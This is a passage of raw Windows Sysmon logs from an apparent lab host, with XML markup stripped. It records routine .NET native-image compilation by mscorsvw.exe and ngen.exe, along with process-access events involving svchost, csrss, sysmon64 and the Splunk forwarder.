.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008404Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:05.120{08A6967A-466D-6000-4C04-000000009A01}2152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\868-0\System.Data.DataSetExtensions.dll2021-01-14 13:26:05.120 10341000x80000000000000008403Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:05.026{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-466D-6000-4C04-000000009A01}2152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008402Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:05.010{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-466D-6000-4C04-000000009A01}2152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008401Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:05.010{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-466D-6000-4C04-000000009A01}2152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008417Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:13.886{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4675-6000-5004-000000009A01}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008416Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:13.870{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4675-6000-5004-000000009A01}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008415Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:13.870{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4675-6000-5004-000000009A01}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008414Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:13.652{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4675-6000-4F04-000000009A01}5048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008413Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:13.636{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4675-6000-4F04-000000009A01}5048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008412Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:13.636{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4675-6000-4F04-000000009A01}5048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008411Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:13.245{08A6967A-466D-6000-4E04-000000009A01}4840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12e8-0\System.Data.Entity.dll2021-01-14 13:26:13.245 10341000x80000000000000008424Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:14.824{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4676-6000-5204-000000009A01}4152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008423Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:14.808{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4676-6000-5204-000000009A01}4152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008422Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:14.808{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4676-6000-5204-000000009A01}4152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008421Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:14.714{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4676-6000-5104-000000009A01}4164C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008420Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:14.699{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4676-6000-5104-000000009A01}4164C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008419Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:14.699{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4676-6000-5104-000000009A01}4164C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008418Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:14.605{08A6967A-4675-6000-5004-000000009A01}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1264-0\System.Data.Entity.Design.dll2021-01-14 13:26:14.605 10341000x80000000000000008437Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:15.371{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4677-6000-5304-000000009A01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008436Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:15.355{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008435Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:15.355{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008434Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:15.355{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008433Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:15.355{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008432Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:15.355{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008431Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:15.355{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008430Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:15.355{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008429Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 